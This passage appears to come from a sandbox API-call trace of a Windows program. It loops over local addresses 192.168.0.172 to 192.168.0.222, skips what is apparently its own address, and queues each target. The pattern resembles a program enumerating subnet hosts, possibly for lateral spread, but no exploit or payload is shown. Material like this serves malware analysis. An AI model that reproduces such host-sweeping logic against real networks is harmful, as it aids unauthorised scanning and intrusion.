out: ListHead=0x2064bd0, ListEntry=0x20abb98) returned 0x20abb70 [0095.966] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.172") returned 13 [0095.966] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.172") returned 1 [0095.966] malloc (_Size=0x1c) returned 0x20abbc0 [0095.966] lstrcpyA (in: lpString1=0x20abbc4, lpString2="192.168.0.172" | out: lpString1="192.168.0.172") returned="192.168.0.172" [0095.966] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abbc0 | out: ListHead=0x2064bd0, ListEntry=0x20abbc0) returned 0x20abb98 [0095.966] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.173") returned 13 [0095.966] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.173") returned 1 [0095.966] malloc (_Size=0x1c) returned 0x20abbe8 [0095.966] lstrcpyA (in: lpString1=0x20abbec, lpString2="192.168.0.173" | out: lpString1="192.168.0.173") returned="192.168.0.173" [0095.966] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abbe8 | out: ListHead=0x2064bd0, ListEntry=0x20abbe8) returned 0x20abbc0 [0095.966] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.174") returned 13 [0095.966] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.174") returned 1 [0095.966] malloc (_Size=0x1c) returned 0x20abc10 [0095.966] lstrcpyA (in: lpString1=0x20abc14, lpString2="192.168.0.174" | out: lpString1="192.168.0.174") returned="192.168.0.174" [0095.967] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abc10 | out: ListHead=0x2064bd0, ListEntry=0x20abc10) returned 0x20abbe8 [0095.967] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.175") returned 13 [0095.967] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.175") returned 1 [0095.967] malloc (_Size=0x1c) returned 0x20abc38 [0095.967] lstrcpyA (in: lpString1=0x20abc3c, lpString2="192.168.0.175" | out: lpString1="192.168.0.175") returned="192.168.0.175" [0095.967] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abc38 | out: ListHead=0x2064bd0, ListEntry=0x20abc38) returned 0x20abc10 [0095.967] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.176") returned 13 [0095.967] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.176") returned 1 [0095.967] malloc (_Size=0x1c) returned 0x20abc60 [0095.967] lstrcpyA (in: lpString1=0x20abc64, lpString2="192.168.0.176" | out: lpString1="192.168.0.176") returned="192.168.0.176" [0095.967] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abc60 | out: ListHead=0x2064bd0, ListEntry=0x20abc60) returned 0x20abc38 [0095.967] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.177") returned 13 [0095.967] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.177") returned 1 [0095.967] malloc (_Size=0x1c) returned 0x20abc88 [0095.967] lstrcpyA (in: lpString1=0x20abc8c, lpString2="192.168.0.177" | out: lpString1="192.168.0.177") returned="192.168.0.177" [0095.967] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abc88 | out: ListHead=0x2064bd0, ListEntry=0x20abc88) returned 0x20abc60 [0095.967] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.178") returned 13 [0095.967] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.178") returned 1 [0095.967] malloc (_Size=0x1c) returned 0x20abcb0 [0095.967] lstrcpyA (in: lpString1=0x20abcb4, lpString2="192.168.0.178" | out: lpString1="192.168.0.178") returned="192.168.0.178" [0095.967] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abcb0 | out: ListHead=0x2064bd0, ListEntry=0x20abcb0) returned 0x20abc88 [0095.967] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.179") returned 13 [0095.967] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.179") returned 1 [0095.967] malloc (_Size=0x1c) returned 0x20abcd8 [0095.967] lstrcpyA (in: lpString1=0x20abcdc, lpString2="192.168.0.179" | out: lpString1="192.168.0.179") returned="192.168.0.179" [0095.967] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abcd8 | out: ListHead=0x2064bd0, ListEntry=0x20abcd8) returned 0x20abcb0 [0095.967] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.180") returned 13 [0095.967] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.180") returned 1 [0095.967] malloc (_Size=0x1c) returned 0x20abd00 [0095.968] lstrcpyA (in: lpString1=0x20abd04, lpString2="192.168.0.180" | out: lpString1="192.168.0.180") returned="192.168.0.180" [0095.968] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abd00 | out: ListHead=0x2064bd0, ListEntry=0x20abd00) returned 0x20abcd8 [0095.968] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.181") returned 13 [0095.968] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.181") returned 1 [0095.968] malloc (_Size=0x1c) returned 0x20abd28 [0095.968] lstrcpyA (in: lpString1=0x20abd2c, lpString2="192.168.0.181" | out: lpString1="192.168.0.181") returned="192.168.0.181" [0095.968] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abd28 | out: ListHead=0x2064bd0, ListEntry=0x20abd28) returned 0x20abd00 [0095.968] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.182") returned 13 [0095.968] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.182") returned 1 [0095.968] malloc (_Size=0x1c) returned 0x20abd50 [0095.968] lstrcpyA (in: lpString1=0x20abd54, lpString2="192.168.0.182" | out: lpString1="192.168.0.182") returned="192.168.0.182" [0095.968] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abd50 | out: ListHead=0x2064bd0, ListEntry=0x20abd50) returned 0x20abd28 [0095.968] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.183") returned 13 [0095.968] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.183") returned 1 [0095.968] malloc (_Size=0x1c) returned 0x20abd78 [0095.968] lstrcpyA (in: lpString1=0x20abd7c, lpString2="192.168.0.183" | out: lpString1="192.168.0.183") returned="192.168.0.183" [0095.968] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abd78 | out: ListHead=0x2064bd0, ListEntry=0x20abd78) returned 0x20abd50 [0095.968] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.184") returned 13 [0095.968] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.184") returned 1 [0095.968] malloc (_Size=0x1c) returned 0x20abda0 [0095.968] lstrcpyA (in: lpString1=0x20abda4, lpString2="192.168.0.184" | out: lpString1="192.168.0.184") returned="192.168.0.184" [0095.968] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abda0 | out: ListHead=0x2064bd0, ListEntry=0x20abda0) returned 0x20abd78 [0095.968] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.185") returned 13 [0095.968] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.185") returned 1 [0095.968] malloc (_Size=0x1c) returned 0x20abdc8 [0095.968] lstrcpyA (in: lpString1=0x20abdcc, lpString2="192.168.0.185" | out: lpString1="192.168.0.185") returned="192.168.0.185" [0095.968] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abdc8 | out: ListHead=0x2064bd0, ListEntry=0x20abdc8) returned 0x20abda0 [0095.968] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.186") returned 13 [0095.968] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.186") returned 1 [0095.969] malloc (_Size=0x1c) returned 0x20abdf0 [0095.969] lstrcpyA (in: lpString1=0x20abdf4, lpString2="192.168.0.186" | out: lpString1="192.168.0.186") returned="192.168.0.186" [0095.969] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abdf0 | out: ListHead=0x2064bd0, ListEntry=0x20abdf0) returned 0x20abdc8 [0095.969] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.187") returned 13 [0095.969] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.187") returned 1 [0095.969] malloc (_Size=0x1c) returned 0x20abe18 [0095.969] lstrcpyA (in: lpString1=0x20abe1c, lpString2="192.168.0.187" | out: lpString1="192.168.0.187") returned="192.168.0.187" [0095.969] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abe18 | out: ListHead=0x2064bd0, ListEntry=0x20abe18) returned 0x20abdf0 [0095.969] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.188") returned 13 [0095.969] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.188") returned 1 [0095.969] malloc (_Size=0x1c) returned 0x20abe40 [0095.969] lstrcpyA (in: lpString1=0x20abe44, lpString2="192.168.0.188" | out: lpString1="192.168.0.188") returned="192.168.0.188" [0095.969] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abe40 | out: ListHead=0x2064bd0, ListEntry=0x20abe40) returned 0x20abe18 [0095.969] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.189") returned 13 [0095.969] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.189") returned 1 [0095.969] malloc (_Size=0x1c) returned 0x20abe68 [0095.969] lstrcpyA (in: lpString1=0x20abe6c, lpString2="192.168.0.189" | out: lpString1="192.168.0.189") returned="192.168.0.189" [0095.969] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abe68 | out: ListHead=0x2064bd0, ListEntry=0x20abe68) returned 0x20abe40 [0095.969] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.190") returned 13 [0095.969] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.190") returned 1 [0095.969] malloc (_Size=0x1c) returned 0x20abe90 [0095.969] lstrcpyA (in: lpString1=0x20abe94, lpString2="192.168.0.190" | out: lpString1="192.168.0.190") returned="192.168.0.190" [0095.969] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abe90 | out: ListHead=0x2064bd0, ListEntry=0x20abe90) returned 0x20abe68 [0095.969] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.191") returned 13 [0095.969] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.191") returned 1 [0095.969] malloc (_Size=0x1c) returned 0x20abeb8 [0095.969] lstrcpyA (in: lpString1=0x20abebc, lpString2="192.168.0.191" | out: lpString1="192.168.0.191") returned="192.168.0.191" [0095.969] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abeb8 | out: ListHead=0x2064bd0, ListEntry=0x20abeb8) returned 0x20abe90 [0095.969] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.192") returned 13 [0095.970] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.192") returned 1 [0095.970] malloc (_Size=0x1c) returned 0x20abee0 [0095.970] lstrcpyA (in: lpString1=0x20abee4, lpString2="192.168.0.192" | out: lpString1="192.168.0.192") returned="192.168.0.192" [0095.970] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abee0 | out: ListHead=0x2064bd0, ListEntry=0x20abee0) returned 0x20abeb8 [0095.970] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.193") returned 13 [0095.970] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.193") returned 1 [0095.970] malloc (_Size=0x1c) returned 0x20abf08 [0095.970] lstrcpyA (in: lpString1=0x20abf0c, lpString2="192.168.0.193" | out: lpString1="192.168.0.193") returned="192.168.0.193" [0095.970] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abf08 | out: ListHead=0x2064bd0, ListEntry=0x20abf08) returned 0x20abee0 [0095.970] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.194") returned 13 [0095.970] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.194") returned 1 [0095.970] malloc (_Size=0x1c) returned 0x20abf30 [0095.970] lstrcpyA (in: lpString1=0x20abf34, lpString2="192.168.0.194" | out: lpString1="192.168.0.194") returned="192.168.0.194" [0095.970] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abf30 | out: ListHead=0x2064bd0, ListEntry=0x20abf30) returned 0x20abf08 [0095.970] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.195") returned 13 [0096.161] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.195") returned 1 [0096.161] malloc (_Size=0x1c) returned 0x20abf80 [0096.161] lstrcpyA (in: lpString1=0x20abf84, lpString2="192.168.0.195" | out: lpString1="192.168.0.195") returned="192.168.0.195" [0096.161] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abf80 | out: ListHead=0x2064bd0, ListEntry=0x20abf80) returned 0x20abf30 [0096.161] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.196") returned 13 [0096.162] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.196") returned 1 [0096.162] malloc (_Size=0x1c) returned 0x20abfa8 [0096.162] lstrcpyA (in: lpString1=0x20abfac, lpString2="192.168.0.196" | out: lpString1="192.168.0.196") returned="192.168.0.196" [0096.162] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abfa8 | out: ListHead=0x2064bd0, ListEntry=0x20abfa8) returned 0x20abf80 [0096.162] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.197") returned 13 [0096.162] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.197") returned 1 [0096.162] malloc (_Size=0x1c) returned 0x20abfd0 [0096.162] lstrcpyA (in: lpString1=0x20abfd4, lpString2="192.168.0.197" | out: lpString1="192.168.0.197") returned="192.168.0.197" [0096.162] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abfd0 | out: ListHead=0x2064bd0, ListEntry=0x20abfd0) returned 0x20abfa8 [0096.162] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.198") returned 13 [0096.162] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.198") returned 1 [0096.162] malloc (_Size=0x1c) returned 0x20abff8 [0096.162] lstrcpyA (in: lpString1=0x20abffc, lpString2="192.168.0.198" | out: lpString1="192.168.0.198") returned="192.168.0.198" [0096.162] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abff8 | out: ListHead=0x2064bd0, ListEntry=0x20abff8) returned 0x20abfd0 [0096.162] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.199") returned 13 [0096.162] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.199") returned 1 [0096.162] malloc (_Size=0x1c) returned 0x20ac020 [0096.162] lstrcpyA (in: lpString1=0x20ac024, lpString2="192.168.0.199" | out: lpString1="192.168.0.199") returned="192.168.0.199" [0096.162] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac020 | out: ListHead=0x2064bd0, ListEntry=0x20ac020) returned 0x20abff8 [0096.162] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.200") returned 13 [0096.162] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.200") returned 1 [0096.162] malloc (_Size=0x1c) returned 0x20ac048 [0096.162] lstrcpyA (in: lpString1=0x20ac04c, lpString2="192.168.0.200" | out: lpString1="192.168.0.200") returned="192.168.0.200" [0096.162] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac048 | out: ListHead=0x2064bd0, ListEntry=0x20ac048) returned 0x20ac020 [0096.162] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.201") returned 13 [0096.162] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.201") returned 1 [0096.162] malloc (_Size=0x1c) returned 0x20ac070 [0096.162] lstrcpyA (in: lpString1=0x20ac074, lpString2="192.168.0.201" | out: lpString1="192.168.0.201") returned="192.168.0.201" [0096.163] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac070 | out: ListHead=0x2064bd0, ListEntry=0x20ac070) returned 0x20ac048 [0096.163] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.202") returned 13 [0096.163] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.202") returned 1 [0096.163] malloc (_Size=0x1c) returned 0x20ac098 [0096.163] lstrcpyA (in: lpString1=0x20ac09c, lpString2="192.168.0.202" | out: lpString1="192.168.0.202") returned="192.168.0.202" [0096.163] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac098 | out: ListHead=0x2064bd0, ListEntry=0x20ac098) returned 0x20ac070 [0096.163] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.203") returned 13 [0096.163] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.203") returned 1 [0096.163] malloc (_Size=0x1c) returned 0x20ac0c0 [0096.163] lstrcpyA (in: lpString1=0x20ac0c4, lpString2="192.168.0.203" | out: lpString1="192.168.0.203") returned="192.168.0.203" [0096.163] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac0c0 | out: ListHead=0x2064bd0, ListEntry=0x20ac0c0) returned 0x20ac098 [0096.163] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.204") returned 13 [0096.163] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.204") returned 1 [0096.163] malloc (_Size=0x1c) returned 0x20ac0e8 [0096.163] lstrcpyA (in: lpString1=0x20ac0ec, lpString2="192.168.0.204" | out: lpString1="192.168.0.204") returned="192.168.0.204" [0096.163] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac0e8 | out: ListHead=0x2064bd0, ListEntry=0x20ac0e8) returned 0x20ac0c0 [0096.163] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.205") returned 13 [0096.163] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.205") returned 1 [0096.163] malloc (_Size=0x1c) returned 0x20ac110 [0096.163] lstrcpyA (in: lpString1=0x20ac114, lpString2="192.168.0.205" | out: lpString1="192.168.0.205") returned="192.168.0.205" [0096.163] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac110 | out: ListHead=0x2064bd0, ListEntry=0x20ac110) returned 0x20ac0e8 [0096.163] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.206") returned 13 [0096.163] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.206") returned 1 [0096.163] malloc (_Size=0x1c) returned 0x20ac138 [0096.163] lstrcpyA (in: lpString1=0x20ac13c, lpString2="192.168.0.206" | out: lpString1="192.168.0.206") returned="192.168.0.206" [0096.163] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac138 | out: ListHead=0x2064bd0, ListEntry=0x20ac138) returned 0x20ac110 [0096.163] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.207") returned 13 [0096.164] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.207") returned 1 [0096.164] malloc (_Size=0x1c) returned 0x20ac160 [0096.164] lstrcpyA (in: lpString1=0x20ac164, lpString2="192.168.0.207" | out: lpString1="192.168.0.207") returned="192.168.0.207" [0096.164] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac160 | out: ListHead=0x2064bd0, ListEntry=0x20ac160) returned 0x20ac138 [0096.164] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.208") returned 13 [0096.164] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.208") returned 1 [0096.164] malloc (_Size=0x1c) returned 0x20ac188 [0096.164] lstrcpyA (in: lpString1=0x20ac18c, lpString2="192.168.0.208" | out: lpString1="192.168.0.208") returned="192.168.0.208" [0096.164] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac188 | out: ListHead=0x2064bd0, ListEntry=0x20ac188) returned 0x20ac160 [0096.164] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.209") returned 13 [0096.164] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.209") returned 1 [0096.164] malloc (_Size=0x1c) returned 0x20ac1b0 [0096.164] lstrcpyA (in: lpString1=0x20ac1b4, lpString2="192.168.0.209" | out: lpString1="192.168.0.209") returned="192.168.0.209" [0096.164] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac1b0 | out: ListHead=0x2064bd0, ListEntry=0x20ac1b0) returned 0x20ac188 [0096.164] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.210") returned 13 [0096.164] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.210") returned 1 [0096.164] malloc (_Size=0x1c) returned 0x20ac1d8 [0096.164] lstrcpyA (in: lpString1=0x20ac1dc, lpString2="192.168.0.210" | out: lpString1="192.168.0.210") returned="192.168.0.210" [0096.164] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac1d8 | out: ListHead=0x2064bd0, ListEntry=0x20ac1d8) returned 0x20ac1b0 [0096.164] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.211") returned 13 [0096.164] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.211") returned 1 [0096.164] malloc (_Size=0x1c) returned 0x20ac200 [0096.164] lstrcpyA (in: lpString1=0x20ac204, lpString2="192.168.0.211" | out: lpString1="192.168.0.211") returned="192.168.0.211" [0096.164] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac200 | out: ListHead=0x2064bd0, ListEntry=0x20ac200) returned 0x20ac1d8 [0096.164] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.212") returned 13 [0096.164] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.212") returned 1 [0096.164] malloc (_Size=0x1c) returned 0x20ac228 [0096.164] lstrcpyA (in: lpString1=0x20ac22c, lpString2="192.168.0.212" | out: lpString1="192.168.0.212") returned="192.168.0.212" [0096.165] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac228 | out: ListHead=0x2064bd0, ListEntry=0x20ac228) returned 0x20ac200 [0096.165] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.213") returned 13 [0096.165] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.213") returned 1 [0096.165] malloc (_Size=0x1c) returned 0x20ac250 [0096.165] lstrcpyA (in: lpString1=0x20ac254, lpString2="192.168.0.213" | out: lpString1="192.168.0.213") returned="192.168.0.213" [0096.165] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac250 | out: ListHead=0x2064bd0, ListEntry=0x20ac250) returned 0x20ac228 [0096.165] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.214") returned 13 [0096.165] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.214") returned 1 [0096.165] malloc (_Size=0x1c) returned 0x20ac278 [0096.165] lstrcpyA (in: lpString1=0x20ac27c, lpString2="192.168.0.214" | out: lpString1="192.168.0.214") returned="192.168.0.214" [0096.165] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac278 | out: ListHead=0x2064bd0, ListEntry=0x20ac278) returned 0x20ac250 [0096.165] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.215") returned 13 [0096.165] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.215") returned 1 [0096.165] malloc (_Size=0x1c) returned 0x20ac2a0 [0096.165] lstrcpyA (in: lpString1=0x20ac2a4, lpString2="192.168.0.215" | out: lpString1="192.168.0.215") returned="192.168.0.215" [0096.165] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac2a0 | out: ListHead=0x2064bd0, ListEntry=0x20ac2a0) returned 0x20ac278 [0096.165] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.216") returned 13 [0096.165] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.216") returned 1 [0096.165] malloc (_Size=0x1c) returned 0x20ac700 [0096.165] lstrcpyA (in: lpString1=0x20ac704, lpString2="192.168.0.216" | out: lpString1="192.168.0.216") returned="192.168.0.216" [0096.165] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac700 | out: ListHead=0x2064bd0, ListEntry=0x20ac700) returned 0x20ac2a0 [0096.165] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.217") returned 13 [0096.165] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.217") returned 1 [0096.165] malloc (_Size=0x1c) returned 0x20ac728 [0096.165] lstrcpyA (in: lpString1=0x20ac72c, lpString2="192.168.0.217" | out: lpString1="192.168.0.217") returned="192.168.0.217" [0096.165] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac728 | out: ListHead=0x2064bd0, ListEntry=0x20ac728) returned 0x20ac700 [0096.165] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.218") returned 13 [0096.165] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.218") returned 1 [0096.166] malloc (_Size=0x1c) returned 0x20ac750 [0096.166] lstrcpyA (in: lpString1=0x20ac754, lpString2="192.168.0.218" | out: lpString1="192.168.0.218") returned="192.168.0.218" [0096.166] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac750 | out: ListHead=0x2064bd0, ListEntry=0x20ac750) returned 0x20ac728 [0096.166] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.219") returned 13 [0096.166] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.219") returned 1 [0096.166] malloc (_Size=0x1c) returned 0x20ac778 [0096.166] lstrcpyA (in: lpString1=0x20ac77c, lpString2="192.168.0.219" | out: lpString1="192.168.0.219") returned="192.168.0.219" [0096.166] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac778 | out: ListHead=0x2064bd0, ListEntry=0x20ac778) returned 0x20ac750 [0096.166] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.220") returned 13 [0096.166] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.220") returned 1 [0096.166] malloc (_Size=0x1c) returned 0x20ac7a0 [0096.166] lstrcpyA (in: lpString1=0x20ac7a4, lpString2="192.168.0.220" | out: lpString1="192.168.0.220") returned="192.168.0.220" [0096.166] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac7a0 | out: ListHead=0x2064bd0, ListEntry=0x20ac7a0) returned 0x20ac778 [0096.166] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.221") returned 13 [0096.166] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.221") returned 1 [0096.166] malloc (_Size=0x1c) returned 0x20ac7c8 [0096.166] lstrcpyA (in: lpString1=0x20ac7cc, lpString2="192.168.0.221" | out: lpString1="192.168.0.221") returned="192.168.0.221" [0096.166] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac7c8 | out: ListHead=0x2064bd0, ListEntry=0x20ac7c8) returned 0x20ac7a0 [0096.166] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.222") returned 13 [0096.166] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.222") returned 1 [0096.166] malloc (_Size=0x1c) returned 0x20ac7f0 [0096.166] lstrcpyA (in: lpString1=0x20ac7f4, lpString2="192.168.0.222" | out: lpString1="192.168.0.222") returned="192.168.0.222" [0096.166] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac7f0 | out: ListHead=0x2064bd0, ListEntry=0x20ac7f0) returned 0x20ac7c8 [0096.166] wsprintfA (in: param_1=0x31cf9a8, 